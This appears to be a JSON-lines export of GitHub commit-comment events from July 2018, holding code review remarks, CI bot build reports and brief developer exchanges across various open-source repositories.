{"id":"8018167289","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29833024,"position":null,"line":null,"path":null,"commit_id":"f12c7259a8c21427257a1a551b1aa4119cf2fbe3","created_at":"2018-07-25T18:13:09Z","updated_at":"2018-07-25T18:13:09Z","author_association":"COLLABORATOR","body":"🔥 [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/98/display/redirect) (on internal Jenkins) failed in stage 'Test docs' 🔥\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/98//console)\n✅ [API Diff (from stable)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/f12c7259a8c21427257a1a551b1aa4119cf2fbe3/98/jenkins-results/api-diff/index.html)\n✅ [API Diff (from PR only)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/f12c7259a8c21427257a1a551b1aa4119cf2fbe3/98/jenkins-results/apicomparison/index.html) (please review changes)\n✅ [Generator Diff](http://xamarin-storage/jenkins/xamarin-macios/xcode10/f12c7259a8c21427257a1a551b1aa4119cf2fbe3/98/jenkins-results/generator-diff/index.html) (only version changes)\n✅ [Test run succeeded](http://xamarin-storage/jenkins/xamarin-macios/xcode10/f12c7259a8c21427257a1a551b1aa4119cf2fbe3/98/jenkins-results/tests/index.html)\n"}},"created_at":"2018-07-25T18:13:09Z"}
{"id":"8018171699","type":"CommitCommentEvent","actor":{"login":"ThFabba"},"repo":{"name":"reactos/reactos"},"payload":{"comment":{"id":29833030,"position":1349,"line":699,"path":"reactos/win32ss/user/user32/user32.spec","commit_id":"8ce92839868c57923e9266a5c169d1254ab4d91d","created_at":"2018-07-25T18:14:00Z","updated_at":"2018-07-25T18:14:00Z","author_association":"CONTRIBUTOR","body":"No it's not. It's not present in Win2003 SP2."}},"created_at":"2018-07-25T18:14:00Z"}
{"id":"8018173159","type":"CommitCommentEvent","actor":{"login":"adolfoherrera1417"},"repo":{"name":"adolfoherrera1417/MemoryGame"},"payload":{"comment":{"id":29833033,"position":null,"line":null,"path":null,"commit_id":"4fbc255e174c9b9610a2e74a32d6aa6d05263205","created_at":"2018-07-25T18:14:17Z","updated_at":"2018-07-25T18:14:17Z","author_association":"OWNER","body":"Error handling update 1:\r\n1. Only two cards can be open at a time.\r\n2. If the cards don't match they will remain open for 1 second then turn back around.\r\n3. If they select the same card it will not cause any errors"}},"created_at":"2018-07-25T18:14:17Z"}
{"id":"8018180096","type":"CommitCommentEvent","actor":{"login":"fmrtl73"},"repo":{"name":"fmrtl73/vagrant"},"payload":{"comment":{"id":29833046,"position":45,"line":200,"path":"k8s/Vagrantfile","commit_id":"6df04be469366984a44cc9ebf812f74ffe69a97e","created_at":"2018-07-25T18:15:36Z","updated_at":"2018-07-25T18:15:36Z","author_association":"OWNER","body":"ah yes, there is a plugin that needs to be installed, I'll ping you and update the README"}},"created_at":"2018-07-25T18:15:36Z"}
{"id":"8018180164","type":"CommitCommentEvent","actor":{"login":"FndNur1Labs"},"repo":{"name":"cryptonotefoundation/cryptonote"},"payload":{"comment":{"id":29833047,"position":null,"line":null,"path":null,"commit_id":"fba953277776be51c68dfe6fdbb4e59bb8314240","created_at":"2018-07-25T18:15:37Z","updated_at":"2018-07-25T18:15:37Z","author_association":"NONE","body":"error: no matching function for call to ‘max(long unsigned int, int)"}},"created_at":"2018-07-25T18:15:37Z"}
{"id":"8018180931","type":"CommitCommentEvent","actor":{"login":"Wild1145"},"repo":{"name":"Telesphoreo/TotalFreedomMod"},"payload":{"comment":{"id":29833050,"position":11,"line":29,"path":"src/main/java/me/totalfreedom/totalfreedommod/world/CleanroomChunkGenerator.java","commit_id":"6eaf4c8d3e416fce34a659b8af332d21fb9d3943","created_at":"2018-07-25T18:15:46Z","updated_at":"2018-07-25T18:15:46Z","author_association":"CONTRIBUTOR","body":"Bad... Very Bad..."}},"created_at":"2018-07-25T18:15:46Z"}
{"id":"8018186488","type":"CommitCommentEvent","actor":{"login":"mistrykaran91"},"repo":{"name":"airbnb/enzyme"},"payload":{"comment":{"id":29833068,"position":null,"line":null,"path":null,"commit_id":"ac27fb2b1856af49d4f601e65ecfb3aa69f91847","created_at":"2018-07-25T18:16:50Z","updated_at":"2018-07-25T18:16:50Z","author_association":"NONE","body":"I'm having an angular app which is quiet big, so I'm lazily loading chunks and just want to ignore few chunks. So, using IgnorePlugin but unable to match the specific folder/directory. Currently my folder structure is  src/app/modules/platform, so I want to ignore platform folder in ng-build but unable to achieve it. Any help will be appreciated. Thanks in advance."}},"created_at":"2018-07-25T18:16:50Z"}
{"id":"8018189663","type":"CommitCommentEvent","actor":{"login":"cmkumar87"},"repo":{"name":"WING-NUS/nus-mooc-corpus"},"payload":{"comment":{"id":29833074,"position":null,"line":null,"path":null,"commit_id":"ab17d314c295c5f03683cfbb23691443c394ae7c","created_at":"2018-07-25T18:17:30Z","updated_at":"2018-07-25T18:17:30Z","author_association":"MEMBER","body":"@radsn23 These encrypted files are called BatchXXXX which is useless. Please renamed these files with the coursename.forumname.batchnumber.csv "}},"created_at":"2018-07-25T18:17:30Z"}
{"id":"8018190522","type":"CommitCommentEvent","actor":{"login":"Telesphoreo"},"repo":{"name":"Telesphoreo/TotalFreedomMod"},"payload":{"comment":{"id":29833080,"position":11,"line":29,"path":"src/main/java/me/totalfreedom/totalfreedommod/world/CleanroomChunkGenerator.java","commit_id":"6eaf4c8d3e416fce34a659b8af332d21fb9d3943","created_at":"2018-07-25T18:17:40Z","updated_at":"2018-07-25T18:17:40Z","author_association":"OWNER","body":"This is no longer where 1.13 is being worked on. https://GitHub.com/TFPatches/TotalFreedomMod"}},"created_at":"2018-07-25T18:17:40Z"}
{"id":"8018203591","type":"CommitCommentEvent","actor":{"login":"jayands"},"repo":{"name":"themasch/node-ebml"},"payload":{"comment":{"id":29833111,"position":3,"line":1,"path":"test/decoder.js","commit_id":"79477d27f0edb69d3ff480209a4eaa7c7b561fcf","created_at":"2018-07-25T18:20:05Z","updated_at":"2018-07-25T18:20:05Z","author_association":"NONE","body":"Why not just define a `.eslintrc` file in the `test/` folder? It will only override what you set, so it could be as small as (in JSON format):\r\n\r\n```json\r\n{\"env\":{\"mocha\":true},\"rules\":{\"no-console\":0}}\r\n```"}},"created_at":"2018-07-25T18:20:05Z"}
{"id":"8018211714","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29833142,"position":null,"line":null,"path":null,"commit_id":"d846bee7b995a60038d1ab284be4b15525c7a5fa","created_at":"2018-07-25T18:21:38Z","updated_at":"2018-07-25T18:21:38Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-25T18:21:38Z"}
{"id":"8018216939","type":"CommitCommentEvent","actor":{"login":"zackkatz"},"repo":{"name":"gravityview/GravityView"},"payload":{"comment":{"id":29833153,"position":19,"line":206,"path":"future/includes/rest/class-gv-rest-views-route.php","commit_id":"8854b70787da1c39038532221deff7dac7a28311","created_at":"2018-07-25T18:22:41Z","updated_at":"2018-07-25T18:22:41Z","author_association":"MEMBER","body":"I really dislike the BOM from Import Entries experience. Is it needed? Can we apply the `gform_include_bom_export_entries` filter here?"}},"created_at":"2018-07-25T18:22:41Z"}
{"id":"8018217849","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29833154,"position":null,"line":null,"path":null,"commit_id":"584f36882d0c14bf45f90dd115ba0559428ab34e","created_at":"2018-07-25T18:22:51Z","updated_at":"2018-07-25T18:22:51Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-25T18:22:51Z"}
{"id":"8018220688","type":"CommitCommentEvent","actor":{"login":"MikeTaylor"},"repo":{"name":"folio-org/stripes-core"},"payload":{"comment":{"id":29833160,"position":null,"line":null,"path":null,"commit_id":"03f42496971df013735c795a0f52beae5d6b0993","created_at":"2018-07-25T18:23:23Z","updated_at":"2018-07-25T18:23:23Z","author_association":"CONTRIBUTOR","body":"Thanks, @rjruizes, I really do appreciate your coping so graciously with all my carping."}},"created_at":"2018-07-25T18:23:23Z"}
{"id":"8018224234","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29833170,"position":null,"line":null,"path":null,"commit_id":"e14f66d8e23120c4afd27ff771368548859a514a","created_at":"2018-07-25T18:24:06Z","updated_at":"2018-07-25T18:24:06Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-25T18:24:06Z"}
{"id":"8018226038","type":"CommitCommentEvent","actor":{"login":"zackkatz"},"repo":{"name":"gravityview/GravityView"},"payload":{"comment":{"id":29833174,"position":36,"line":223,"path":"future/includes/rest/class-gv-rest-views-route.php","commit_id":"8854b70787da1c39038532221deff7dac7a28311","created_at":"2018-07-25T18:24:25Z","updated_at":"2018-07-25T18:24:25Z","author_association":"MEMBER","body":"FYI: I'm using `X-Item-Total` now for the total results available for the query, and `X-Item-Count` for items returned for the request. See https://github.com/gravityview/GravityView/commit/9d4491082f35ee4c0e24fef3ad64b97dca2108fa"}},"created_at":"2018-07-25T18:24:25Z"}
{"id":"8018226295","type":"CommitCommentEvent","actor":{"login":"cpshanley"},"repo":{"name":"MaxBazarov/exporter"},"payload":{"comment":{"id":29833175,"position":null,"line":null,"path":null,"commit_id":"9851093614f4d4eac955f0a2abff3fa1aca79c5d","created_at":"2018-07-25T18:24:28Z","updated_at":"2018-07-25T18:24:28Z","author_association":"NONE","body":"Hi Max. Love the plugin. Don't know what a customised link is, though! Does this allow for a 'Previous artboard' link in Sketch?\r\n\r\nAlso, would be lovely to see overlay support.\r\n\r\nKeep it up!"}},"created_at":"2018-07-25T18:24:28Z"}
{"id":"8018228299","type":"CommitCommentEvent","actor":{"login":"mfgu"},"repo":{"name":"flexible-atomic-code/fac"},"payload":{"comment":{"id":29833180,"position":null,"line":null,"path":null,"commit_id":"3aae2fd8f8d478aec71805bbec330fc3caa821f4","created_at":"2018-07-25T18:24:52Z","updated_at":"2018-07-25T18:24:52Z","author_association":"COLLABORATOR","body":"thanks for the suggestion, Evgeny.\nI made the read functions backward compatible.\n\nOn Wed, Jul 25, 2018 at 10:31 AM, Evgeny Stambulchik <\nnotifications@github.com> wrote:\n\n> I believe by changing LSNAME and LNAME you break binary compatibility with\n> previous versions. Conditional processing like if\n> (version_read[DB_EN-1]...) should be added or there would be crashes.\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/flexible-atomic-code/fac/commit/3aae2fd8f8d478aec71805bbec330fc3caa821f4#commitcomment-29829760>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AMnr8XueS9GuEj8lfj_zdMcx5gG1-Povks5uKIFHgaJpZM4VgMhr>\n> .\n>\n"}},"created_at":"2018-07-25T18:24:52Z"}
{"id":"8018229187","type":"CommitCommentEvent","actor":{"login":"learn-more"},"repo":{"name":"Fraizeraust/reactos"},"payload":{"comment":{"id":29833182,"position":16,"line":331,"path":"base/applications/msconfig_new/msconfig.c","commit_id":"5cb4270d40ab921123bb2e1825acb01ce7717783","created_at":"2018-07-25T18:25:03Z","updated_at":"2018-07-25T18:25:03Z","author_association":"NONE","body":"This `IDD_GENERAL_PAGE` should be the ID of your dialog."}},"created_at":"2018-07-25T18:25:03Z"}
{"id":"8018230659","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29833184,"position":null,"line":null,"path":null,"commit_id":"00b7483b5b50f7e4bb5018976b57fec6cbe53cd4","created_at":"2018-07-25T18:25:20Z","updated_at":"2018-07-25T18:25:20Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-25T18:25:20Z"}
{"id":"8018231068","type":"CommitCommentEvent","actor":{"login":"learn-more"},"repo":{"name":"Fraizeraust/reactos"},"payload":{"comment":{"id":29833185,"position":18,"line":333,"path":"base/applications/msconfig_new/msconfig.c","commit_id":"5cb4270d40ab921123bb2e1825acb01ce7717783","created_at":"2018-07-25T18:25:25Z","updated_at":"2018-07-25T18:25:25Z","author_association":"NONE","body":"You add 1 (possible) dialog to the psp array, increment it's size."}},"created_at":"2018-07-25T18:25:25Z"}
{"id":"8018254020","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29833254,"position":null,"line":null,"path":null,"commit_id":"6b69f69ef3c37e0e035fb6cacf3f6b8ef0530d7a","created_at":"2018-07-25T18:29:50Z","updated_at":"2018-07-25T18:29:50Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-542](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-542).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-542-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-25T18:29:50Z"}
{"id":"8018256812","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29833263,"position":null,"line":null,"path":null,"commit_id":"e14f66d8e23120c4afd27ff771368548859a514a","created_at":"2018-07-25T18:30:22Z","updated_at":"2018-07-25T18:30:22Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-25T18:30:22Z"}
{"id":"8018257413","type":"CommitCommentEvent","actor":{"login":"josephsmartinez"},"repo":{"name":"CASTIC-Linux/ShellScripts"},"payload":{"comment":{"id":29833266,"position":null,"line":null,"path":null,"commit_id":"fa3cc5622e35f3158a6a8df801a5372127eae419","created_at":"2018-07-25T18:30:28Z","updated_at":"2018-07-25T18:30:28Z","author_association":"CONTRIBUTOR","body":"Okay"}},"created_at":"2018-07-25T18:30:28Z"}
{"id":"8018260670","type":"CommitCommentEvent","actor":{"login":"martha-thomae"},"repo":{"name":"DDMAL/CMN-MEI_to_MensuralMEI_Translator"},"payload":{"comment":{"id":29833272,"position":20,"line":100,"path":"MEI_Translator.py","commit_id":"f6e093e1d7b068ee9ac57bf303a322fc6a143c6b","created_at":"2018-07-25T18:31:05Z","updated_at":"2018-07-25T18:31:05Z","author_association":"COLLABORATOR","body":"This line tabulation was wrong and that caused that voice_segments only stored the last mensuration change multiple times (the number of times corresponding to the actual number of changes in mensuration). This is why when there is only one change in mensuration, the code still works."}},"created_at":"2018-07-25T18:31:05Z"}
{"id":"8018263623","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29833279,"position":null,"line":null,"path":null,"commit_id":"30c2c454c36a33ca351d9f717a29210b25671bd4","created_at":"2018-07-25T18:31:38Z","updated_at":"2018-07-25T18:31:38Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-25T18:31:38Z"}
{"id":"8018264502","type":"CommitCommentEvent","actor":{"login":"martha-thomae"},"repo":{"name":"DDMAL/CMN-MEI_to_MensuralMEI_Translator"},"payload":{"comment":{"id":29833282,"position":23,"line":102,"path":"MEI_Translator.py","commit_id":"f6e093e1d7b068ee9ac57bf303a322fc6a143c6b","created_at":"2018-07-25T18:31:47Z","updated_at":"2018-07-25T18:31:47Z","author_association":"COLLABORATOR","body":"Line's tabulation fixed here.\r\nNow the voice_segments list captures all the segments corresponding to each change in mensuration."}},"created_at":"2018-07-25T18:31:47Z"}
{"id":"8018267115","type":"CommitCommentEvent","actor":{"login":"thartharkyee"},"repo":{"name":"thekngmkr/open-msp-viewer"},"payload":{"comment":{"id":29833287,"position":12,"line":12,"path":"css/msp-outline.css","commit_id":"f987030d4a8466a13458444507b3255a87463c4a","created_at":"2018-07-25T18:32:16Z","updated_at":"2018-07-25T18:32:16Z","author_association":"NONE","body":"O"}},"created_at":"2018-07-25T18:32:16Z"}
{"id":"8018270496","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29833291,"position":null,"line":null,"path":null,"commit_id":"9ff879811f4c95e4ebf9b965c64288f1d8c62639","created_at":"2018-07-25T18:32:54Z","updated_at":"2018-07-25T18:32:54Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-25T18:32:54Z"}
{"id":"8018272130","type":"CommitCommentEvent","actor":{"login":"MorrisJobke"},"repo":{"name":"DrRSatzteil/documentmanager"},"payload":{"comment":{"id":29833295,"position":11,"line":9,"path":"lib/Database/OrganisationMapper.php","commit_id":"ce66e5c0b5e41177c5d46cf71b812f42c0ed80e6","created_at":"2018-07-25T18:33:12Z","updated_at":"2018-07-25T18:33:12Z","author_association":"NONE","body":"This is not a public API and should not be used. Also it then is not injectable, because we only register the interface name for the apps DI container AFAIK."}},"created_at":"2018-07-25T18:33:12Z"}
{"id":"8018273504","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29833298,"position":null,"line":null,"path":null,"commit_id":"8b3a9295958d3929300d86b21e08ef92c19ea6cb","created_at":"2018-07-25T18:33:28Z","updated_at":"2018-07-25T18:33:28Z","author_association":"COLLABORATOR","body":"<h3>[select] ensure active item is always enabled (#2723)</h3>\n\nPreview: <strong><a href='https://19154-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://19154-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://19154-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-25T18:33:28Z"}
{"id":"8018273697","type":"CommitCommentEvent","actor":{"login":"MaxBazarov"},"repo":{"name":"MaxBazarov/exporter"},"payload":{"comment":{"id":29833299,"position":null,"line":null,"path":null,"commit_id":"9851093614f4d4eac955f0a2abff3fa1aca79c5d","created_at":"2018-07-25T18:33:29Z","updated_at":"2018-07-25T18:33:29Z","author_association":"OWNER","body":"No.\n\nYou can create a symbol with some hotspots inside. After that you place\nthis symbol in your artboard. And you see in Sketch, in Customization\npanel, an abiity to specify where symbol hotspots will follow.\n\nWe are using it to customize modal dialog symbol buttons for some specific\nscreen.\n\nIf my description was not quite clear then I can prepare some screenshots\nto illustrate it.\n\nThanks for feedback!\n\nсреда, 25 июля 2018 г. пользователь cpshanley написал:\n\n> Hi Max. Love the plugin. Don't know what a customised link is, though!\n> Does this allow for a 'Previous artboard' link in Sketch?\n>\n> Also, would be lovely to see overlay support.\n>\n> Keep it up!\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/MaxBazarov/exporter/commit/9851093614f4d4eac955f0a2abff3fa1aca79c5d#commitcomment-29833175>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ARkKghvMpgqergCi42ENgIQ_fGjI-fvqks5uKLfcgaJpZM4VgkS9>\n> .\n>\n"}},"created_at":"2018-07-25T18:33:29Z"}
{"id":"8018276255","type":"CommitCommentEvent","actor":{"login":"lars-kolbowski"},"repo":{"name":"Rappsilber-Laboratory/xiSPEC_website"},"payload":{"comment":{"id":29833305,"position":null,"line":null,"path":null,"commit_id":"e60144179c10122f245f6585b022e3c533f1c214","created_at":"2018-07-25T18:34:00Z","updated_at":"2018-07-25T18:34:00Z","author_association":"NONE","body":"yeah looks like I forgot to comment out that line"}},"created_at":"2018-07-25T18:34:00Z"}
{"id":"8018276465","type":"CommitCommentEvent","actor":{"login":"gabrielhsantos"},"repo":{"name":"gabrielhsantos/github-master"},"payload":{"comment":{"id":29833306,"position":5,"line":15,"path":"contato.html","commit_id":"7667a7172998f8d8768cac9a64efa9dcd62d8ba4","created_at":"2018-07-25T18:34:03Z","updated_at":"2018-07-25T18:34:03Z","author_association":"OWNER","body":"Contato do site"}},"created_at":"2018-07-25T18:34:03Z"}
{"id":"8018276832","type":"CommitCommentEvent","actor":{"login":"gabrielhsantos"},"repo":{"name":"gabrielhsantos/github-master"},"payload":{"comment":{"id":29833308,"position":null,"line":null,"path":null,"commit_id":"7667a7172998f8d8768cac9a64efa9dcd62d8ba4","created_at":"2018-07-25T18:34:08Z","updated_at":"2018-07-25T18:34:08Z","author_association":"OWNER","body":"Troca do parágrafo para Contato do site"}},"created_at":"2018-07-25T18:34:08Z"}
{"id":"8018276871","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29833309,"position":null,"line":null,"path":null,"commit_id":"d846bee7b995a60038d1ab284be4b15525c7a5fa","created_at":"2018-07-25T18:34:08Z","updated_at":"2018-07-25T18:34:08Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-25T18:34:08Z"}
{"id":"8018277794","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29833312,"position":null,"line":null,"path":null,"commit_id":"3808a2561fc3bc457869863b3c834c6531cc9a6c","created_at":"2018-07-25T18:34:18Z","updated_at":"2018-07-25T18:34:18Z","author_association":"COLLABORATOR","body":"<h3>[docs] handful of small edits (#2722)</h3>\n\nPreview: <strong><a href='https://19156-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://19156-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://19156-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-25T18:34:18Z"}
{"id":"8018283590","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29833323,"position":null,"line":null,"path":null,"commit_id":"30c2c454c36a33ca351d9f717a29210b25671bd4","created_at":"2018-07-25T18:35:24Z","updated_at":"2018-07-25T18:35:24Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-25T18:35:24Z"}
{"id":"8018284941","type":"CommitCommentEvent","actor":{"login":"Traesh"},"repo":{"name":"AshamaneProject/AshamaneCore"},"payload":{"comment":{"id":29833325,"position":null,"line":null,"path":null,"commit_id":"aab605b9448a24d03287f512a5fe28adb1b54963","created_at":"2018-07-25T18:35:39Z","updated_at":"2018-07-25T18:35:39Z","author_association":"NONE","body":"I already apply 208166 but i do it after the spell hit, so the cooldown has already been applied for 205021\r\n\r\nI could indeed cast if beforeCast but eh, it work in a blizzlike way already, and the whole thing will change at BFA anyway :p"}},"created_at":"2018-07-25T18:35:39Z"}
